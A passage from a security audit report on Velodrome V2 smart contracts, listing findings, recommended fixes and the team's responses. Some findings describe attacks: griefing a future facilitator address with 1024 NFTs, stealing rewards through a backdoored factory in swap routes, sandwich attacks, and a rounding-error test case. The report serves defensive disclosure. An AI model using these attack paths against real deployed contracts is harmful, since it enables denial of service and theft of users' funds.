requirement on _to as it creates a worse user experience (e.g. you may vote and then realize you want to merge but can't and have to wait until the next epoch). By not constraining _to, the user has a few more options, with the trade-off being they must call poke() if they merge 46 or risk losing some rewards that epoch, we also made the voting (Voter::vote()) to be much more flexible in that regard. Anybody increasing their veNFT lock amount or merging into their veNFT, or generally those who want to change their vote last minute, are free to do it. V2 front-end will communicate the need to re-cast the votes after: • merge() • increaseAmount() • increaseUnlockTime() Regarding poke, we will not be adding it to VotingEscrow due to gas concerns. I think regarding this issue, we will leave it as is, as it provides greater flexibility on how users can use their veNFTs. Confirmed with the team. Spearbit: Acknowledged. +5.6.5 Ratio of invariant _k to totalSupply of the AMM pool may temporarily decrease Severity: Informational Context: Pair.sol#L365-L386 Description: The burn function directly sends the reserve pro-rated to the liquidity token. This is a simple and elegant way. Nevertheless, two special features of the current AMM would lead to a weird situation. 1. The fee of the AMM pool is sent to the fee contract instead of being absorbed into the pool; 2. The stable pool's curve x3y + y3x have a larger rounding error compare to uni-v2's constant product formula. The invariant K in a stable pool can decrease temporarily when a user performs certain actions like minting a token, doing a swap, and withdrawing liquidity. This means that the ratio of K to the total supply of the pool is not monotonously increasing. In most cases, this temporary decrease is negligible and the ratio of K to the total supply of the pool will eventually increase again. However, the ratio of K to the total supply is an important metric for calculating the value of LP tokens, which are used in many protocols. If these protocols are not aware of the temporary decrease in the K value, they may suffer from serious issues (e.g. overflow). The root cause of this issue is: there are always rounding errors when using "balance" to calculate invariant k. Sometimes, the rounding error is larger. if an lp is minted when the rounding error is small (ratio of amount: k is small) and withdrawn when the rounding error is large (ratio of amount: k is large). The total invariant decreased. We can find a counter-example where the invariant decrease. function testRoundingErrorAttack(uint swapAmount) public { // The counter-example: swapAmount = 52800410888861351333 vm.assume(swapAmount < 100_000_000 ether); vm.assume(swapAmount > 10 ether); uint reserveA = 10 ether; uint reserveB = 10 ether; uint initialK = _k(reserveA, reserveB); reserveA *= 2; reserveB *= 2; uint tempK = _k(reserveA, reserveB); reserveB -= _getAmountOut(swapAmount, token0, reserveA, reserveB); reserveA += swapAmount; vm.assume(tempK <= _k(reserveA, reserveB)); reserveA -= reserveA / 2; reserveB -= reserveB / 2; require(_k(reserveA, reserveB) > } initialK, "Rounding error attack!"); 47 Recommendation: We recommend documenting this issue. The ratio of invariant k to totalSupply is a common way to securely value lp tokens. This may potentially break external protocols (e.g. overflow when evaluating rewards distribution in a vault) There are rounding errors everywhere; this in most cases, would not be critical. The burn function of the AMM pool, while bearing some rounding error, is an efficient way to return liquidity. Also, modifying the mechanism of burning liquidity in an AMM pool would possibly lead to serious issues. Velodrome: Will add documentation around this issue. Spearbit: Acknowledged. +5.6.6 Inconsistent check for adding value to a lock Severity: Informational Context: VotingEscrow.sol#L807 Description: depositFor allows anyone to add value to an existing lock However increaseAmount, which for NORMAL locks is idempotent, has a check to only allow an approved or Owner to increase the amount. Recommendation: Document the inconsistency, or decide if the check should be performed or removed from both functions Velodrome: We're considering keeping the depositFor open and just documenting it's purpose. Spearbit: Acknowledged. +5.6.7 Privileged actors are incentivized to front-run each other Severity: Informational Context: Voter.sol#L209-L224 Description: Privileged actors are incentivized to front-run each other and vote at the last second, because of the FIFS OP sequencer, managers will try to vote exactly at the penultimate block in order to maximize their options (voting can only be done once) Recommendation: Velodrome: These actions already exist in the current protocol design as users want to wait as long as possible to vote for the rewards with the highest APY. It makes it hard to know for certain how well a bribe works until the voting period is over, and perhaps some voters wait for just a second too long and miss voting, but otherwise, we have not seen a design solution that remediates this. Spearbit: Acknowledged. +5.6.8 First nudge propose must happen one epoch before tail is set to true Severity: Informational Context: Minter.sol#L65-L84 Description: Because you can only propose a nudge one epoch in advance, the first propose call will need to happen on the last epoch in which tail is set to false While the transaction simulation will fail for execute, the EpochGovernor.propose math will make it so that the first proposal will have to be initiated an epoch before in order for it to be executable on the first tail epoch Recommendation: Remind end users about this quirk and perhaps host an event for it Velodrome: Acknowledged, will update the documentation to make this clearer. Spearbit: Acknowledged. 48 +5.6.9 Missing emit important events Severity: Informational Context: ManagedRewardsFactory.sol#L10 , PairFactory.sol Description: The contracts that change or create sensible information should emit an event. Recommendation: Add events to emit for • ManagedRewardsFactory: creating new managed rewards • PairFactory: setVoter, setPauser, setPauseState and setFeeManager Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.6.10 Marginal rounding errors when using small values Severity: Informational Context: Voter.sol#L187 Description: It may be helpful to encourage end users to use BPS or higher denominations for weights when dealing with multiple gauges to keep precision high. Due to widespread usage of the _vote function throughout the codebase and in forks, it may be best to suggest this in documentation to avoid reverts Recommendation: It is recommended to validate the weights at a minimum of 1 BPS Velodrome: I believe this should be handled by the front end. Suggest that minimum increments should be with single basis points? I think at the moment, the front end only lets you select in 1% increments (i.e. 100 BPS). We can add additional documentation to note this though. Spearbit: Acknowledged. +5.6.11 Prefer to use nonReentrant on external functions Severity: Informational Context: Voter.sol#L166-L170 Description: it may be best to use nonReentrant on the external functions rather than the internal ones. Vote, for example, is not protected because the internal function is. Recommendation: functions vote and poke. It is recommended to change the nonReentrant modifier from internal _vote to external Velodrome: Fixed in commit 111d83. Spearbit: Verified. 49 +5.6.12 Redundant variable update Severity: Informational Context: Gauge.sol#L180-L211 Description: In notifyRewardAmount the variable lastUpdateTime is updated twice Recommendation: It is recommended to remove one update of lastUpdateTime function notifyRewardAmount(uint256 _amount) external nonReentrant { ... - lastUpdateTime = lastTimeRewardApplicable(); ... lastUpdateTime = timestamp; ... } Velodrome: Fixed in commit a336f7. Spearbit: Verified. +5.6.13 Turn logic into internal function Severity: Informational Context: Gauge.sol#L109-L112, Gauge.sol#L145-148, Gauge.sol#L161-L164 Description: In Gauge contract the logic to update rewardPerTokenStored,lastUpdateTime,rewards,userRewardsPerTokenPaid can be converted to internal function for simplicity Recommendation: It is recommended to create an internal function and replace this logic function getReward(address _account) external nonReentrant { ... rewardPerTokenStored = rewardPerToken(); lastUpdateTime = lastTimeRewardApplicable(); rewards[_account] = earned(_account); userRewardPerTokenPaid[_account] = rewardPerTokenStored; - - - - + _updateRewards(_account); ... } + function _updateRewards(address _account) internal { + + + + +} rewardPerTokenStored = rewardPerToken(); lastUpdateTime = lastTimeRewardApplicable(); rewards[_account] = earned(_account); userRewardPerTokenPaid[_account] = rewardPerTokenStored; Velodrome: Fixed in commit a336f7. Spearbit: Verified. 50 +5.6.14 Add extra slippages on client-side when dependent paths are used in generateZapInParams Severity: Informational Context: Router.sol#L759-L790, Router.sol#L793-L823 Description: generateZapInParams is a helper function in Router that calculates the parameters for zapIn. there's a duplicate pair in RoutesA and RoutesB, the value calculated here would be off. For example, The optimal path to swap dai into usdc/velo pair would likely have dai/eth in both routesA and routesB. When the user uses this param to call zapIn, it executes two swaps: dai -> eth -> usdc, and dai -> eth -> velo. As the price of dai/eth is changed after the first swap, the second swap would have a slightly bad price. The zapIn will likely revert as it does not meet the min token return. If Recommendation: As mentioned by the project team, the front end would add extra slippage when dependent paths are used. Would be good if this is documented. Velodrome: Will add documentation. Spearbit: Acknowledged. +5.6.15 Unnecessary skim in router Severity: Informational Context: Router.sol#L258, Router.sol#L311 Description: The pair contract absorbs any extra tokens after swap, mint, and burn. Triggering Skim after burn/mint would not return extra tokens. Recommendation: We can save gas by skipping one external call. We have to be careful when providing liquidity. If the router does not get the optimal token amount on providing liquidity, the user just loses funds. As a result, recommend adjusting the comment in quoteLiquidity. Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.6.16 Overflow is not desired and can lead to loss of funds in Solidity ˆ8.0.0 Severity: Informational Context: Pair.sol#L235 Description: In solidity ˆ8.0, overflow of uint is defaulted to be reverted. //Pair.sol#L235-L239 uint256 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) { reserve0CumulativeLast += _reserve0 * timeElapsed; reserve1CumulativeLast += _reserve1 * timeElapsed; } reserve0CumulativeLast += _reserve0 * timeElapsed; This calculation will overflow and DOS the pair if _- reserve0 is too large. As a result, the pool should not support high decimals tokens. Recommendation: High decimals token will break the protocols in many places (e.g. the invariant formula would overflow). This revert will not likely be triggered in any case. Recommend the team just change the misleading comment. Velodrome: Will update documentation. Spearbit: Acknowledged. 51 +5.6.17 Unnecessary casting Severity: Informational Context: Voter.sol#L148 Description: _totalWeight is already declared as uint256 Recommendation: Remove uint256 casting in _totalWeight Velodrome: Fixed in commit 111d83. Spearbit: Verified. +5.6.18 Refactor retrieve current epoch into library Severity: Informational Context: Voter.sol#L81-L83 Description: Could refactor to a library function to retrieve the current epoch Recommendation: Refactor the logic of retrieving the current epoch into a library function. Velodrome: Issue address in commit 111d83. Spearbit: Verified. +5.6.19 Add governor permission to sensible functions Severity: Informational Context: VotingEscrow.sol#L217-L222 Description: Some functions that change important variables could add governor permission to enable changes. The function setManagedState in VotingEscrow is one that is recommended to add governor permission. Recommendation: It is recommended to change the code to follow function setManagedState(uint256 _mTokenId, bool _state) external { - + require(msg.sender == IVoter(voter).emergencyCouncil(), "VotingEscrow: not emergency council"); require(_msgSender() == IVoter(voter).emergencyCouncil() || _msgSender() == ,! IVoter(voter).governor(), "VotingEscrow: not emergency council"); ... } Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.6.20 Admin privilege through proposal threshold Severity: Informational Context: VeloGovernor.sol#L39-L47 Description: As an Admin Privilege of the Team, the variable proposalNumerator could change causing the proposalThreshold to be higher than expected. The Team could front-run calls to propose and increase the numerator, this could block proposals Recommendation: As a recommendation, these types of settings should be changed only by multi-sig wallet. Velodrome: Acknowledged. Spearbit: Acknowledged. 52 +5.6.21 Simplify check for rounding error Severity: Informational Context: Voter.sol#L415, Gauge.sol#L71 Description: The check of rounding error can be simplified. Instead using A / B > 0 use A > B Recommendation: It is recommended to refactor to //Voter - if (_claimable > IGauge(_gauge).left() && _claimable / DURATION > 0) { + if (_claimable > IGauge(_gauge).left() && _claimable > DURATION) { //Gauge - if (_fees0 > IReward(feesVotingReward).left(_token0) && _fees0 / DURATION > 0) { + if (_fees0 > IReward(feesVotingReward).left(_token0) && _fees0 > DURATION) { Velodrome: Fixed in commit 111d83. Spearbit: Verified. +5.6.22 Storage declarations in the middle of the file Severity: Informational Context: Voter.sol#L317-L319 Description: If you wish to keep the logic separate, consider creating a separate abstract contract. Recommendation: It is recommended to create an abstract contract with all storage variables. Velodrome: Elected to move storage declarations to the top of the file. Spearbit: Verified. +5.6.23 Inconsistent usage of _msgSender() Severity: Informational Voter.sol#L75-L78, Context: VotingEscrow.sol#L218, VotingEscrow.sol#L256 Description: There are some instances where msg.sender is used in contrast with _msgSender() function. Recommendation: It is recommended to keep the pattern and change msg.sender to _msgSender() VotingEscrow.sol#L63, VotingEscrow.sol#L239, VotingEscrow.sol#L234, Voter.sol#L124, VotingEscrow.sol#L209, VotingEscrow.sol#L547, Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 53 +5.6.24 Change emergency council should be enabled to Governor Severity: Informational Context: Voter.sol#L117-L120 Description: Governor may also want to be able to set and change the emergency council, this avoids the potential risk of the council abusing their power Recommendation: It is recommended to check if the sender is governor function setEmergencyCouncil(address _council) public { - + require(_msgSender() == emergencyCouncil, "Voter: not emergency council"); require(_msgSender() == emergencyCouncil || _msgSender() == governor, "Voter: not emergency council ,! or governor"); emergencyCouncil = _council; } Velodrome: List of emergency council permissions Set emergency council Kill or revive a gauge Set the name / symbol of a pair (NEW) Veto a proposal (unconfirmed) I will consult with the team. I think if the vetoer will be set to emergencyCouncil, it does not make much sense to allow emergencyCouncil to be settable by governor. Ran this by the team and we'd like to keep things separate: • Allow veto (Vetoer function) to be called by the team msig: this way the team can veto any governor ac- tions/proposals as a protocol responsible party • Do not allow the governor to change/set the emergency council msig: this way only the previous emergency council can change the msig of the new council A bit more reasoning. Our goal is to make Velodrome fully decentralized. The emergency council would eventually be replaced by the governor, meaning that it would make sense to keep the veto right separate from such a change. Naturally, the very next step would be to renounce the Vetoer right from the team. Spearbit: Acknowledged. +5.6.25 Unnecessary inheritance in Velo contract Severity: Informational Context: Velo.sol#L9 Description: Velo isn't used for governance, therefore it's not necessary to inherit from ERC20Votes. Recommendation: It is recommended to replace ERC20Votes with ERC20Permit. Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 54 +5.6.26 Incorrect value in Mint event Severity: Informational Context: Minter.sol#L120 Description: In Minter#update_period the Mint event is emitted with incorrect values. Recommendation: It is recommended to use updated values - emit Mint(msg.sender, _emission, _totalSupply, _tail); + emit Mint(msg.sender, _emission, velo.totalSupply(), _tail); Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.6.27 Do not cache constants Severity: Informational Context: Minter.sol#L74 Description: It is not necessary to cache constant variable. Recommendation: It is recommended to use the constant instead of caching it. Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.6.28 First week will have no emissions Severity: Informational Context: Minter.sol#L54 Description: Cannot call update_period on the first week due to setting the current period to this one. Emissions will start at most one week after Recommendation: It is recommended to set the week in construction to one week before constructor(...) { ... active_period = ((block.timestamp) / WEEK) * WEEK; // allow emissions this coming epoch active_period = (((block.timestamp) / WEEK) * WEEK) - WEEK; // allow emissions this coming epoch - + } Velodrome: I think the logistics of the migration will involve deployment shortly after the epoch flip, with emissions being distributed to gauges for that week (on v1). Migration can then begin, with protocols bribing on the new contracts and votes accumulating on new pools as the week progresses. Then the following week, emissions will be distributed on v2 as normal. Since update_period is callable by anyone, it does not make sense to allow emissions to be distributed immedi- ately as there should be some grace period to allow users to migrate and for votes to populate (e.g. imagine a situation where someone votes for their own pool and then calls update_period immediately). The V1 and V2 will be operating in tandem, and V2 transition will be progressive and will require communication from our side either way. Overall, the bump in emissions on V2, in the beginning, should compensate folks who opt to move their liquidity to V2 gauges in the very first week. Spearbit: Acknowledged. 55 +5.6.29 Variables can be renamed for better clarity Severity: Informational Context: Minter.sol#L23 Description: For a better understanding, some variables could be renamed. Recommendation: It is recommended to rename the following variable. - uint256 public constant EMISSION = 9_900; + uint256 public constant WEEKLY_DECAY = 9_900; Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.6.30 Minter week will eventually shift Severity: Informational Context: Minter.sol#L21 Description: The constant WEEK is used as the duration of an epoch that resets every Thursday, after 4 years (4 * 365.25 days) the day of the week will eventually shift, not following the Thursday cadence. Recommendation: This is an informational issue without a fix, that week's shift will eventually happen. Velodrome should be aware of this change Velodrome: Noted, we will document it somewhere to make it clearer and change references to Thursday in the code. Spearbit: Acknowledged. +5.6.31 Ownership change will break certain yield farming automations Severity: Informational Context: VotingEscrow.sol#L137-L138 Description: Due to the check, any transfer done in the same block as the call to depositManaged will revert. While a sidestep for the mechanic for malicious users was shown, the check will prevent a common use case in Yield Farming: Zapping. Because of the check, an end user will not be able to zap from their VELO to VE to the Managed Position, which may create a sub-par experience for end users. This should also create worse UX for Yield Farming Projects as they will have to separate the transfer from the deposit which will cost them more gas and may make their product less capital efficient Recommendation: Consider the ownershipChange lock further and decide if it's worth maintaining or removing Velodrome: Fixed in commit 02e0bc. Spearbit: Verified. 56 +5.6.32 Quantitative analysis of Minter logic Severity: Informational Context: Minter.sol#L32 Description: It will take 110 iterations to go from 15 MLN to the Tail Emission Threshold Minter.sol#L32-L37 /// @notice When emissions fall below this amount, begin tail emissions uint256 public constant TAIL_START = 5_000_000 * 1e18; /// @notice Tail emissions rate in basis points uint256 public tailEmissionRate = 30; /// @notice Starting weekly emission of 15M VELO (VELO has 18 decimals) uint256 public weekly = 15_000_000 * 1e18; ## Python allows decimal Math, wlog, just take mantissa INITIAL = 15 * 10 ** 6 TAIL = 5 * 10 ** 6 MULTIPLIER_BPS = 99_00 MAX_BPS = 10_000 value = INITIAL i = 0 min_emitted = 0 while (value > TAIL): i+= 1 min_emitted += value value = value * MULTIPLIER_BPS / MAX_BPS i 110 value 4965496.324815211 min_emitted 1003450367.5184793 ## If nobody ever bridged, this would be emissions at tail min_emitted * 30 / 10_000 3010351.1025554384 Tail emissions are most likely going to be a discrete step down in emissions >>> min_emitted 1003450367.5184793 V1_CIRC = 150 * 10 ** 6 ranges = range(V1_CIRC // 10, V1_CIRC, V1_CIRC // 10) for val in ranges: print((min_emitted + val) * 30 / 10_000) 3055351.1025554384 3100351.1025554384 3145351.1025554384 3190351.1025554384 3235351.1025554384 3280351.1025554384 3325351.1025554384 3370351.1025554384 3415351.1025554384 The last value before the tail will be most likely around 1 Million fewer tokens minted per period. Maximum Mintable Value is slightly above Tail, with Absolute Max being way above Tail 57 ## Max Supply >>> 1000 * 10 ** 6 1000000000 >>> min_emitted = 1003450367.5184793 >>> max_circ = 1000 * 10 ** 6 + min_emitted >>> max_mint = max_circ * 30 / 10_000 ## If we assume min_emitted + 1 Billion Velo V1 Sinked >>> max_mint 6010351.102555438 ## If we assume nudge to 100 BPS >>> abs_max_mint = max_circ * 100 / 10_000 >>> abs_max_mint 20034503.675184794 Recommendation: Consider if these are the intended consequences. Velodrome: QA 1: 110 weeks look alright. QA 2: CUR_EPOCH = 38 TAIL_EPOCH = 110 CUR_SUPPLY = 841884804.4495 CUR_VE_SUPPLY = 706050740 next_lp, next_rebase = 10238318.925 * 0.99, CUR_VE_SUPPLY * 0.2/52 total_supply = CUR_SUPPLY ve_supply = CUR_VE_SUPPLY for week in range(CUR_EPOCH, TAIL_EPOCH): total_supply += next_lp + next_rebase # team total_supply += 0.03 * (next_lp + next_rebase) ve_supply = 0.8 * total_supply next_lp, next_rebase = next_lp * 0.99, ve_supply * 0.2/52 (Assuming 20% rebase APY and 80% lock rate) Results: >>> total_supply 1668569723.3304946 >>> total_supply * 30 / 10_000 5005709.169991484 QA 3: Tbh I can't see anything wrong here, even if the governance of velofed decides tailEmissionRate should be up to the maximum it's still working as intended. From the economical design looks like we chose to multiply tailEmissionRate with totalsupply instead of scaling a fixed value like 5M, so the amount minted is going to be a divergent series even with a fixed tailEmissionRate. Spearbit: Acknowledged. 58 +5.6.33 Optimism's block production may change in the future Severity: Informational Context: GovernorSimpleVotes.sol#L22, VeloGovernor.sol#L31 In contrast to OZ's Governor which uses timestamp, the GovernorSimpleVotes contract uses Description: block number, because of OP potentially changing block frequency in the future, given Bedrocks update to block.timestamp, it may be desirable to refactor back to the OZ implementation. And VeloGorvernor assumes 2 blocks every second. In OP's docs says block.number is not a reliable timing reference: community.optimism.io/docs/developers/build/differences/#block- numbers-and-timestamps It's also dangerous to use block.number at the time cause it will probably mean a different thing in pre- and post- bedrock upgrades. Recommendation: The recommendation is to refactor back to OZ implementation. Velodrome: Given OpenZeppelin's support for a more flexible Governor that can allow contracts to select a clock of their liking, we have elected to refactor back to a timestamp based system while choosing timestamps as the default clock for VotingEscrow. Refactor towards timestamp based Governors in this PR: commit 08c2bc. Spearbit: Verified. +5.6.34 Remove unnecessary check Severity: Informational Context: GovernorSimple.sol#L266-L267 Description: These checks are unnecessary because it already checks if targets and calldata lengths are equal to 1. Recommendation: Remove the checks - require(targets.length == values.length, "GovernorSimple: invalid proposal length"); - require(targets.length == calldatas.length, "GovernorSimple: invalid proposal length"); Velodrome: Acknowledged and will fix. Spearbit: Acknowledged. +5.6.35 Event is missing indexed fields Severity: Informational Context: Pair.sol#L70-L73, Pair.sol#L81-L82, IMinter.sol#L4, IMinter.sol#L6, IPairFactory.sol#L4-L5, IReward.sol#L4-L7, IRewardDistributor.sol#L4-L5, ISinkManager.sol#L7- L8, IVoterEscrow.sol#L50-L52, IVoterEscrow.sol#L74, SinkConverter.sol#L21 IFactoryRegistry.sol#L5-L7, ISinkManager.sol#L16, IVoterEscrow.sol#L42, IVoter.sol#L13-L18, IGauge.sol#L4-L8, Description: Index event fields make the field more quickly accessible to off-chain tools that parse events. How- ever, note that each index field costs extra gas during emission, so it's not necessarily best to index the maximum allowed per event (three fields). Each event should use three indexed fields if there are three or more fields, and gas usage is not particularly of concern for the events in question. If there are fewer than three fields, all of the fields should be indexed. Recommendation: Consider ensuring that all events are correctly indexed to the protocols needs. Velodrome: Acknowledged, we will make changes accordingly. Spearbit: Acknowledged. 59 +5.6.36 Missing checks for address(0) when assigning values to address state variables Severity: Informational FactoryRegistry.sol#L26-L28, RewardsDistributor.sol#L308, Context: Voter.sol#L113, Velo.sol#L22, VotingE- Voter.sol#L119, scrow.sol#L240, VotingEscrow.sol#L1114, PairFactory.sol#L54, PairFactory.sol#L64-L65, PairFactory.sol#L85, PairFactory.sol#L95, PairFactory.sol#L87, PairFactory.sol#L12, SinkManager.sol#L134, PairFactory.sol#L64-L66 RewardsDistributor.sol#L39-L40, VotingEscrow.sol#L235, VeloGovernor.sol#L36, VotingEscrow.sol#L64, VotingEscrow.sol#L66, Voter.sol#L107, Voter.sol#L101, Velo.sol#L28, Description: Lack of zero-address validation on address parameters may lead to transaction reverts, waste gas, require resubmission of transactions and may even force contract redeployments in certain cases within the proto- col. Recommendation: Consider adding explicit zero-address validation on input parameters of address type. Velodrome: Acknowledged. Spearbit: Acknowledged. +5.6.37 Incorrect comment Severity: Informational Context: Mentioned in Recommendation Description: There are a few mistakes in the comments that can be corrected in the codebase. Recommendation: • Router.sol#L148: Invalid comment as it does not create a new pair if it doesn't exist yet within this function. - // create the pair if it doesn't exist yet address _pair = IPairFactory(_factory).getPair(tokenA, tokenB, stable); (uint256 reserveA, uint256 reserveB) = (0, 0); • Router.sol#L179: Invalid comment as it does not create a new pair if it doesn't exist yet within this function. require(amountADesired >= amountAMin); require(amountBDesired >= amountBMin); - // create the pair if it doesn't exist yet address _pair = IPairFactory(defaultFactory).getPair(tokenA, tokenB, stable); Velodrome: Fixed in commit eb7f0ed. Spearbit: Verified. +5.6.38 Discrepancies between specification and implementation Severity: Informational Context: Router.sol#L579, Router.sol#L718 Description: Instance 1 - Zapping The specification mentioned that it supports zapping into a pool from any token. Following is the extract • Swapping and lp depositing/withdrawing of fee-on-transfer tokens. • Zapping in and out of a pool from any token (i.e. A->(B,C) or (B,C) -> A). A can be the same as B or C. • Zapping and staking into a pool from any token. 60 However, the zapIn and zapOut functions utilize the internal _swap function that does not support fee-on-transfer tokens. Recommendation: Consider updating the specification to explicitly state that zapping is not supported for fee-on- transfer tokens. Additionally, consider adding comments to the zapping function to highlight this limitation. Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.6.39 Early exit for withdrawManaged function Severity: Informational Context: VotingEscrow.sol#L165 If _mTokenId is zero, Description: VotingEscrow.withdrawManaged function. Recommendation: For defense in depth, consider reverting and exiting the function immediately if _mTokenId is zero to avoid any potential edge cases when executing the rest of the code. there is no point executing the rest of the code within the Velodrome: Fixed in commit 827917. Spearbit: Verified. 61 6 Appendix 6.1 Appendix: Summary The findings in this section correspond to the post-engagement review conducted over a split period of two separate weeks, the week of May 22nd to May 26th and the week of June 12th to June 16th. The commit hash at e5635f was reviewed during the first period. Fixes and other modifications were implemented by the Velodrome team in between the first and second period. During the second period, the following commit was used 274c77. 6.2 High Risk +6.2.1 DOS attack at future facilitator contract and stop SinkManager.convertVe Severity: High Risk Context: SinkManager.sol#L123 Description: As noted in "DOS attack by delegating tokens at MAX_DELEGATES = 1024", the old votingEscrow has a gas concern, i.e., the gas cost of transfer/ burn will increase when an address holds multiple NFT tokens. The concern becomes more serious when the protocol is deployed on Optimism, where the gas limit is smaller than other L2 chains. If an address is being attacked and holds max NFT tokens (1024), the user can not withdraw funds due to the gas limit. To mitigate the potential DOS attack where the attack DOS the v1's votingEscrow and stop sinkManager from re- ceiving tokens, the sinkManager utilize a facilitator contract. When the sinkManager needs to receive the votingE- scrow NFT, it creates a new contract specifically for this purpose. Since the contract is newly created, it does not contain any tokens, making it more gas-efficient to receive the token through the facilitator contract. However, the attacker can DOS attack the contract by sending NFT tokens to a future facilitator. salted-contract-creations-create2 When creating a contract, the address of the contract is computed from the address of the creating contract and a counter that is increased with each contract creation. The exploit scenario would be: At the time the sinkManager is deployed and zero facilitator is created. The attacker can calculate the address of all future facilitators by computing sha3(rlp.encode([normalize_address(sender), nonce]))[12:] The attacker can compute the 10-th facilitator's address and sends 1024 NFT tokens to the ad- dress. The sinkManager will function normally nine times. Though, when the 10th user wants to convert the token, the sinkManager deployed the 10th facilitator address. Since the 10th facilitator already has 1024 NFT positions, it can not receive any tokens. The transaction will revert and the sinkManager will be stuck in the current state. Recommendation: Recommend to use cloneDeterministic (Clones.sol#L45-L56) with an unpredictable salt. uint256 private counter; // ... /// @inheritdoc ISinkManager function convertVe(uint256 tokenId) external nonReentrant returns (uint256 tokenIdV2) { { // ... // Create contract to facilitate the merge SinkManagerFacilitator facilitator = ,! SinkManagerFacilitator(Clones.cloneDeterministic(facilitatorImplementation, sha3(abi.encodedcounter, blockhash(block.number - 1)))); ,! counter++; // ... } Two behaviors the fix try to achieve: 1. Put some randomness to the facilitator's address so that the attacker can't predict and attack it. 62 2. ThesinkManagershould not be stopped even if one address failed to receive tokens. Velodrome: Fixed in commit 7b35b2. In addition to blockhash(block.number-1), additional user-provided salt is provided to further increase the cost of griefing attacks. Spearbit: Verified. +6.2.2 RewardDistributor caching totalSupply leading to incorrect reward calculation Severity: High Risk Context: RewardsDistributor.sol#L136-L159 Description: RewardDistributor distributes newly minted VELO tokens to users who locks the tokens in VotingEscrow. Since the calculation of past supply is costly, the rewardDistributor cache the supply value in uint256[1000000000000000] public veSupply. The RewardDistributor._checkpointTotalSupply function would iterate from the last updated time util the latest epoch time, fetches totalSupply from votingEscrow, and store it. Assume the following scenario when a transaction is executed at the beginning of an epoch. 1. The totalSupply is X. 2. The user calls checkpointTotalSupply. The rewardDistributor save the totalSupply = X. 3. The user creates a lock with 2X the amount of tokens. The user has balance = 2X and the totalSupply becomes 3X. 4. Fast forward to when the reward is distributed. The user claims the tokens, reward is calculated by total reward * balance / supply and user gets 2x of the total rewards. Recommendation: This issue shares a lot of similarities to "Reward calculates earned incorrectly on each epoch boundary" at a lower severity. The quick fix would be to stop rewardDistributor caching totalSupply when it can still increase. function _checkpointTotalSupply() internal { address _ve = ve; uint256 t = timeCursor; uint256 roundedTimestamp = (block.timestamp / WEEK) * WEEK; IVotingEscrow(_ve).checkpoint(); - + for (uint256 i = 0; i < 20; i++) { if (t > roundedTimestamp) { if (t >= roundedTimestamp) { break; } else { // fetch last global checkpoint prior to time t uint256 epoch = _findTimestampEpoch(t); IVotingEscrow.GlobalPoint memory pt = IVotingEscrow(_ve).pointHistory(epoch); int128 dt = 0; if (t > pt.ts) { dt = int128(int256(t - pt.ts)); } // walk forward voting power to time t veSupply[t] = uint256(int256(max(pt.bias - pt.slope * dt, 0))) + ,! pt.permanentLockBalance; } t += WEEK; } timeCursor = t; } 63 Given similar issues occur multiple times in the code base and the nuance of this issue can be. We recommend not caching the totalSupply in rewardDistributor and fetching totalSupply from the votingEscrow every time is needed. Velodrome: Fixed in commit 2d7f02. RewardDistributor now fetches the 1 second before the epoch flip oftotalSupply and balanceOf from votingEscrow. Spearbit: Verified. 6.3 Medium Risk +6.3.1 Lack of slippage control during compounding Severity: Medium Risk Context:AutoCompounder.sol#L78, AutoCompounder.sol#L91 Description: When swapping the reward tokens to VELO tokens during compounding, the slippage control is disabled by configuring the amountOutMin to zero. This can potentially expose the swap/trade to sandwich attacks and MEV (Miner Extractable Value) attacks, resulting in a suboptimal amount of VELO tokens received from the swap/trade. router.swapExactTokensForTokens( balance, 0, // amountOutMin routes, address(this), block.timestamp ); Recommendation: Consider implementing some form of slippage control to reduce the risks associated with sandwich attacks and MEV attacks. Since the claimBribesAndCompound and claimFeesAndCompound functions are permissionless, the slippage parameters should be dynamically computed before the trade. Otherwise, mali- cious users could set an excessively high slippage tolerance enabling large price deviations. This, in combination with a sandwich attack to extract the maximum value from the trade. One possible solution is to dynamically compute the minimum amount of VELO tokens to be received after the trade based on the maximum allowable slippage percentage (e.g. 5%) and the exchange rate (Source Token <> VELO) from a source that cannot be manipulated (e.g. Chainlink, Custom TWAP). Alternatively, consider restricting access to these functions to only certain actors who can be trusted to define an appropriate slippage parameter where possible. Velodrome: See commit b4283f for the proposed fix. Another thing to note is that Optimism does not currently enable MEV / sandwiching due to the private mempool so the only probability in this MEV happening is in a protocol change. Spearbit: Fixed. +6.3.2 ALLOWED_CALLER can steal all rewards from AutoCompounder using a fake factory in the route. Severity: Medium Risk Context: AutoCompounder.sol#L187 Description: AutoCompounder allows address with ALLOWED_CALLER role to trigger swapTokenToVELOAndCompound. The function sells the specified tokens to VELO. Since the Velo router supports multiple factories. An attacker can deploy a fake factory with a backdoor. By routing the swaps through the backdoor factory the attacker can steal all reward tokens in the AutoCompounder contract. Recommendation:: As mentioned by the Velodrome team, we can only allow certain factories to be in the route. 64 One potential solution could be to check the factory in the routes against the registry to see if it is approved. Besides the fix, we should acknowledge the risk and pay more attention to permission management. The AL- LOWED_CALLER can always steal the rewards. As noted in this issue: "Lack of slippage control during compound- ing", an attacker can steal the tokens by sandwiching the trades. This is the current limitation of DEFI. There's no easy way to do it without an oracle. Velodrome: Fixed code in commit 24e50b. We had originally implemented the fix and then determined the bigger risk for a user would be calling the router from a frontend that can pass in any arbitrary factory. This would be a risk as a compromised website could correctly interact with the router by using a fake factory and act maliciously. With commit 24e50b. we ensure that any interaction with the router is done with a PoolFactory approved by our registry. We also made a change to the registry where once a PoolFactory is approved, it will always appear as a registered PoolFactory. Spearbit: Verified. +6.3.3 depositManaged can be used by locks to receive unvested VELO rebase rewards Severity: Medium Risk Context: RewardsDistributor.sol#L134-L143 Description: Velo offer rebase emissions to all Lockers. These are meant to be depositFor into an existing lock, and directly transferred if the lock just expired. The check is the following: if (_timestamp > _locked.end && !_locked.isPermanent) { By calling depositManaged we can get the check to pass for a Lock that is not expired, allowing us to receive Unvested Velo (we could sell unfairly for example). Due to how depositManaged and withdrawManaged work, 